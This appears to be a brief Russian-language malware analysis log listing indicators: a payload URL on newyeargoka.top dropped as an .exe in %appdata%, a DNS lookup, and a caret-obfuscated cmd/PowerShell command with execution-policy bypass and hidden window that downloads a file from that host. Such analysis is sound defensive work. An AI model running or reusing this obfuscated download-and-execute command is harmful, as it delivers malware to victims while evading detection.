Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWER^sHEL^l^.E^X^e^ -exeCutIonPO^L^I^C^Y BY^PA^SS -NoP^rOfI^Le^ ^-^Wi^N^DO^w^STy^le hIDD^En (nEw-Ob^j^E^C^t s^yStEM.^N^eT^.WeBcLI^eNT)^.D^o^wnL^oAdF^IL^E(^'http://newyeargoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "p^OWER^sHEL^l^.E^X^e^ -exeCutIonPO^L^I^C^Y BY^PA^SS -NoP^rOfI^Le^ ^-^Wi^N^DO^w^STy^le hIDD^En (nEw-Ob^j^E^C^t s^yStEM.^N^eT^.WeBcLI^eNT)^.D^o^wnL^oAdF^IL^E(^'http://newyeargoka....' (со скрытым окном)